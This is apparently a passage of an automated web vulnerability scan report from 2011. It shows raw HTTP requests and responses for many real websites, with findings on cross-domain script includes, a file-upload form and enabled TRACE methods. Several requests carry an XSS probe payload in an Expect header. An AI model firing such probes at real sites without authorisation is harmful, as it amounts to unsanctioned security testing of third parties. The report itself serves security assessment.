Content-Length: 5118
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:01:58 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><meta http-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.uww.edu/apps/icit/errors/common/css/styles.css" media="screen,projection" />
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

22.68. http://www.vc.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vc.edu
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vc.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=1052626;expires=Fri, 26-Apr-2041 03:45:59 GMT;path=/
Set-Cookie: CFTOKEN=295e83118cbb823b-3B26501A-C377-6A35-92E84F921D835DA0;expires=Fri, 26-Apr-2041 03:45:59 GMT;path=/
Set-Cookie: JSESSIONID=843072c7a2b0d97f73f85f532b6672661b7e;path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:45:58 GMT
Content-Length: 36781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

22.69. http://www.webreserv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webreserv.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webreserv.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3BA7968851849A10CCCACC8488F2F5D7; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 04 May 2011 04:17:44 GMT
Content-Length: 3773

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

22.70. http://www.webware.com/c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webware.com
Path:   /c

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /c HTTP/1.1
Host: www.webware.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:28:48 GMT
Server: Apache
Vary: Host
Accept-Ranges: bytes
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: text/html
Cache-Control: private
Content-Length: 21942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<!-- Vader loves you -->
<head>


...[SNIP]...
<link type="text/css" rel="stylesheet" rev="stylesheet" href="http://i.i.com.com/cnwk.1d/css/rb/tron/news/default.css"/>
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" rev="stylesheet" href="http://i.i.com.com/cnwk.1d/css/rb/tron/reviews/default.css"/>
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/commerce/commerce.tron.dfll.compressed.js"></script>
...[SNIP]...
<!-- MAC ad -->

   <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
<!-- REVENUE SCIENCE -->
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/js/rsi/dm_client_CNET.js"></script>
...[SNIP]...

22.71. http://www.webware.com/crossdomain.xm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webware.com
Path:   /crossdomain.xm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /crossdomain.xm HTTP/1.1
Host: www.webware.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:28:46 GMT
Server: Apache
Vary: Host
Accept-Ranges: bytes
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: text/html
Cache-Control: private
Content-Length: 22199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<!-- Vader loves you -->
<head>


...[SNIP]...
<link type="text/css" rel="stylesheet" rev="stylesheet" href="http://i.i.com.com/cnwk.1d/css/rb/tron/news/default.css"/>
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" rev="stylesheet" href="http://i.i.com.com/cnwk.1d/css/rb/tron/reviews/default.css"/>
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/commerce/commerce.tron.dfll.compressed.js"></script>
...[SNIP]...
<!-- MAC ad -->

   <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
<!-- JavaScript Only -->
<script type="text/javascript" src="http://cdn4.eyewonder.com/cm/js/10295-119241-27904-8?mpt=2011.05.04.01.28.46&mpvc=">
</script>
...[SNIP]...
<!-- REVENUE SCIENCE -->
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/js/rsi/dm_client_CNET.js"></script>
...[SNIP]...

22.72. http://www.whitepages.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitepages.ca
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whitepages.ca
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 03:16:56 GMT
Status: 200 OK
X-Runtime: 0.02728
ETag: "819b009dba80241e53c53603d55c1ce1"
Connection: keep-alive
Set-Cookie: wp_endemic_provider=B; domain=.whitepages.ca; path=/; expires=Wed, 04 May 2011 15:16:56 GMT
Set-Cookie: wp_perm=pid%3D93sYFnX8EeCdSQAfKQmSpg; domain=.whitepages.ca; path=/; expires=Thu, 03 May 2012 03:16:56 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.whitepages.ca; path=/; expires=Thu, 03 May 2012 03:16:56 GMT
Set-Cookie: _wpn_sid=e070ab7070942dc475186e058fe80f9c; domain=.whitepages.ca; path=/
Content-Length: 15589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Free Peo
...[SNIP]...
</p>
<script src="http://js.revsci.net/gateway/gw.js?csid=A06546" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://pixel.quantserve.com/api/segments.json?a=p-13CZptiqAcX_w&amp;callback=whitepages.vendor.quantast_demographics_callback" type="text/javascript"></script>
...[SNIP]...

22.73. http://www.wtok.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtok.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wtok.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Server-Name: dv-c1-r2-u14-b12
Content-Type: text/html;charset=utf-8
Date: Wed, 04 May 2011 02:00:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
X-N: S
Content-Length: 34319

<script type="text/javascript">
<!--
window.location = "http://www.wtok.com/sitemap"
//-->
</script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD html 4.01 Transitional//EN" "http://www.w3.org/TR/1999/RE
...[SNIP]...
</script>
<script src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=200806280400" type="text/javascript" language="javascript1.3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23. File upload functionality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imagepix.org
Path:   /favicon.ico

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imagepix.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Wed, 04 May 2011 03:15:37 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: PHPSESSID=h78thm00s0hn3k1ugucm8cpru6; expires=Wed, 04-May-2011 06:02:17 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="ru" xml:lang="ru">

...[SNIP]...
<form action="http://imagepix.org/upload/" method="post" enctype="multipart/form-data">
<input type="file" name="image"/>
<input type="hidden" name="MAX_FILE_SIZE" value="5000000"/>
...[SNIP]...

24. TRACE method is enabled  previous  next
There are 1163 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


24.1. http://beam.to/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beam.to
Path:   /

Request

TRACE / HTTP/1.0
Host: beam.to
Cookie: 7f89a70e91a0c7d7

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:14:59 GMT
Content-Type: message/http
Content-Length: 61

TRACE / HTTP/1.0
Host: beam.to
Cookie: 7f89a70e91a0c7d7


24.2. http://dw.com.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dw.com.com
Path:   /

Request

TRACE / HTTP/1.0
Host: dw.com.com
Cookie: 7c5ee2f018b4bbf6

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:54 GMT
Server: Apache/2.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: dw.com.com
Cookie: 7c5ee2f018b4bbf6
Connection: Keep-Alive
X-CNET-Forwarded-For: 173.193.214.243


24.3. http://ping.crowdscience.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ping.crowdscience.com
Cookie: 4351f98e8bcbb6dd

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Content-Type: message/http
Date: Wed, 04 May 2011 01:29:04 GMT
Connection: close

TRACE / HTTP/1.0
X-Forwarded-Proto: http
Host: ping.crowdscience.com
X-Cluster-Client-Ip: 173.193.214.243
Cookie: 4351f98e8bcbb6dd
Connection: Keep-Alive


24.4. http://secure-us.imrworldwide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: 38d7eff9e9efb7c0

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:53 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 38d7eff9e9efb7c0
Host: secure-us.imrworldwide.com


24.5. http://tags.bluekai.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tags.bluekai.com
Cookie: 789e5104283fe04c

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:29:03 GMT
Content-Type: message/http
Connection: close

TRACE / HTTP/1.0
Host: tags.bluekai.com
Cookie: 789e5104283fe04c
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=259200


24.6. http://tracking.mediabarons.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.mediabarons.net
Path:   /

Request

TRACE / HTTP/1.0
Host: tracking.mediabarons.net
Cookie: 87f4d6dc51fbd62e

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:53:57 GMT
Server: Apache/2.2.17 (Unix) mod_apreq2-20051231/2.6.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracking.mediabarons.net
Cookie: 87f4d6dc51fbd62e
True-Client-IP: 173.193.214.243


24.7. http://tracking.moon-ray.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.moon-ray.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tracking.moon-ray.com
Cookie: 393746e10a468c6e

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
Date: Wed, 04 May 2011 00:55:24 GMT
Connection: close

TRACE / HTTP/1.0
Host: tracking.moon-ray.com
X-Cluster-Client-Ip: 173.193.214.243
Cookie: 393746e10a468c6e
Connection: Keep-Alive


24.8. http://www.01net.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.01net.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.01net.com
Cookie: 40b34213b57c915f

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:52:18 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.10
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.01net.com
Cookie: 40b34213b57c915f


24.9. http://www.0fees.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.0fees.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.0fees.net
Cookie: fdc462f47ba83c1d

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:57:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Content-Type: message/http
X-Cache: MISS from sv32.byethost32.org
Via: 1.1 sv32.byethost32.org:80 (squid/2.7.STABLE9)
Connection: close

TRACE / HTTP/1.0
Host: www.0fees.net
Cookie: fdc462f47ba83c1d
Via: 1.0 sv32.byethost32.org:80 (squid/2.7.STABLE9)
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=259200
Connection: keep-alive


24.10. http://www.1-800-volunteer.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1-800-volunteer.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.1-800-volunteer.org
Cookie: dc6f01d17fd2aa14

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:43:18 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.1-800-volunteer.org
Cookie: dc6f01d17fd2aa14


24.11. http://www.100-0principle.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.100-0principle.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.100-0principle.com
Cookie: 5219d6a25e7d3043

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:40:08 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.100-0principle.com
Cookie: 5219d6a25e7d3043


24.12. http://www.1000rr.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1000rr.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.1000rr.net
Cookie: 9b44290c030eabd3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:44:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.1000rr.net
Cookie: 9b44290c030eabd3


24.13. http://www.1000text-messaging.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1000text-messaging.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.1000text-messaging.com
Cookie: fcba46e32fe2795f

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:23:40 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.1000text-messaging.com
Cookie: fcba46e32fe2795f


24.14. http://www.1280.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1280.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.1280.com
Cookie: 13fc9c6f198e0fc3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:43:49 GMT
Server: Apache/2.2.9 (Unix) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8h PHP/5.2.6 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.1280.com
Cookie: 13fc9c6f198e0fc3


24.15. http://www.14ers.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.14ers.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.14ers.com
Cookie: a64a2c657960fe39

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:46:49 GMT
Server: Apache/2.0.63 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.14ers.com
Cookie: a64a2c657960fe39


24.16. http://www.188movie.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.188movie.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.188movie.com
Cookie: a1fa809e003618a0

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:24:58 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5 mod_perl/1.29 FrontPage/5.0.2.2510
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: a1fa809e003618a0
Host: www.188movie.com


24.17. http://www.1stdibs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1stdibs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.1stdibs.com
Cookie: 83c2cd6d0ea44d6b

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:43:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7 PHP/5.2.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.1stdibs.com
Cookie: 83c2cd6d0ea44d6b


24.18. http://www.1sttimeblackamateurs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1sttimeblackamateurs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.1sttimeblackamateurs.com
Cookie: 2ad9d4e299609fea

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:14:34 GMT
Server: Microsoft-IIS/5.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 2ad9d4e299609fea
Host: www.1sttimeblackamateurs.com


24.19. http://www.2001live.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2001live.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.2001live.com
Cookie: 9fb9f98633bd995b

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:54:58 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.2001live.com
Cookie: 9fb9f98633bd995b


24.20. http://www.2ch.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2ch.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.2ch.net
Cookie: b3836518e19f2748

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:47:10 GMT
Server: Apache/2.2.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.2ch.net
Cookie: b3836518e19f2748


24.21. http://www.2itb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2itb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.2itb.com
Cookie: 86b18f820829215d

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:24:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.2itb.com
Cookie: 86b18f820829215d


24.22. http://www.3d3.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.3d3.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.3d3.com
Cookie: 3bd73ae6736142a5

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:21:42 GMT
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_gzip/1.3.26.1a mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 3bd73ae6736142a5
Host: www.3d3.com


24.23. http://www.3officegirls.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.3officegirls.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.3officegirls.com
Cookie: b389079840cc3e15

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:38:53 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.3officegirls.com
Cookie: b389079840cc3e15


24.24. http://www.3planeta.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.3planeta.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.3planeta.com
Cookie: 323a2c78c3ecb4c3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:56:05 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a PHP/4.4.7 mod_perl/1.29 FrontPage/5.0.2.2510
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 323a2c78c3ecb4c3
Host: www.3planeta.com


24.25. http://www.3tierlogic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.3tierlogic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.3tierlogic.com
Cookie: f484a071959a6590

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:39:52 GMT
Server: Apache/2.2.10 (Unix) DAV/2 PHP/5.2.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.3tierlogic.com
Cookie: f484a071959a6590


24.26. http://www.3x-pics.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.3x-pics.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.3x-pics.com
Cookie: 6c9d74b793233290

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:20:08 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9 mod_ssl/2.8.31 OpenSSL/0.9.7e-p1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 6c9d74b793233290
Host: www.3x-pics.com


24.27. http://www.4m.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4m.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.4m.net
Cookie: 496a133a5e70e808

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:44:11 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.4m.net
Cookie: 496a133a5e70e808


24.28. http://www.5gb.cc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.5gb.cc
Path:   /

Request

TRACE / HTTP/1.0
Host: www.5gb.cc
Cookie: 83a8cf490a09a2e5

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:38:12 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: message/http
X-Cache: MISS from sv38.byethost38.org
Via: 1.1 sv38.byethost38.org:80 (squid/2.7.STABLE9)
Connection: close

TRACE / HTTP/1.0
Host: www.5gb.cc
Cookie: 83a8cf490a09a2e5
Via: 1.0 sv38.byethost38.org:80 (squid/2.7.STABLE9)
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=259200


24.29. http://www.5ilthy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.5ilthy.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.5ilthy.com
Cookie: 30eb1a2291449a4

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:00:40 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.5ilthy.com
Cookie: 30eb1a2291449a4


24.30. http://www.5staroutlet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.5staroutlet.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.5staroutlet.com
Cookie: cb3b0e09bc9075e2

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 01:38:58 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 73

TRACE / HTTP/1.0
Host: www.5staroutlet.com
Cookie: cb3b0e09bc9075e2


24.31. http://www.60minutedeposit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.60minutedeposit.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.60minutedeposit.com
Cookie: d359c0b21046a30f

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:26:25 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.60minutedeposit.com
Cookie: d359c0b21046a30f


